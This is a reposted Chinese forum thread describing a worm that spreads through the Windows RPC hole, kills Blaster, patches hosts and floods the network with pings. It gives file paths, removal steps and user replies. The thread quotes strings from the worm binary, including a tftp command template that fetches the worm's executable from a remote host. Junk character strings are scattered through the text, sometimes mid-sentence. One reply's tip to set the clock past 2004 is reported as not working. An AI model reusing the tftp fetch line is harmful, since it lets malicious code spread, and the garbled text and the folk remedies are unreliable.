[转帖]最新RPC漏洞病毒.关于最近的疯狂ping

自由居居士

该病毒的特点是将“冲击波”(Worm.Blaster)病

毒干掉，并在系统内值入，预防冲击波病毒的疫苗。
7 F1 G' b$ s6 F7 G% q
  U, r! f% i' v3 i. l6 e( ]! z8 ]+ `然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然
- S* i, @9 [5 B) d* X1 ?8 `5 |
, d/ j9 H# {8 W. `. R后该病毒会开启数百个的线程PING其它IP地址，并通过RPC漏洞快速传播自己，

消耗大量CPU和网络资源，并且有可能会导致系统死机。该病毒的作者似乎无意
9 _8 ]9 h/ ?1 q7 i# q. h( y
作恶，病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测，只感染能够PING通的机器，因此广大用户，
" Q" k" }2 B& b" p2 C: I8 F! o
设置防火墙的规则，禁止ping，这样可以有效防止该病毒的入侵。
9 \9 |7 B/ y8 s! U

  `  h% n( m" y4 m( \如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒

* K+ M  ~) D* Z6 f2 T' u( YSVCHOST.EXE 大小是19.2K
0 d1 }" U* w! @0 [+ o4 D& ]- h1 dDLLHOST.EXE 大小是10.K
. \. e9 H: j* j. y: H
DLLHOST.EXE里面有这样的话!


9 r$ E+ x1 h# F/ H' x引用:
! e; |# f0 H5 g' w' u' K
7 r4 {( Z8 M6 s' H1 J3 N=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE

这2个文件在在：％Windir％\system32\wins\目录里..（注意:不是：％Windir％\system32\..）
% o! M  A8 R- [( e% W, e/ [

紧急解决方案：
停止一下两个服务：

. E4 Q0 p* r# x* ~# r# _6 _+ S6 ONetwork connections Sharing
* b1 M" }* t5 F' p. A5 |WINS Client

* d5 u' H$ A4 T8 U在：％Windir％\system32\wins\
. `: g0 c2 K2 {" {目录下删除：

, ^: W  r, c2 R) R% }9 N3 ]3 jSVCHOST.EXE
DLLHOST.EXE
$ q' ~8 B/ s! Z0 V
这两个文件，安装防火墙，并禁止PING。

猴子很忙

防火墙跳个不停

wtuje

请问，要是我要共享，又要不受这病毒，那该怎么办，因为我们是共享上网的

有点麻烦。。。。。。。。

把日期改到2004年以后呀

wtuje

唉，没用的，我改到了2005，还是这样 ，要卡的，CPU利用率到快一百了，，我不共享马上就好了，有没有别的办法啊

自由居居士

看来还是取消网络共乡有效啊~~

煎饼

删除染毒文件，安装补丁，然后安装天网防火墙，这样就不会再次感染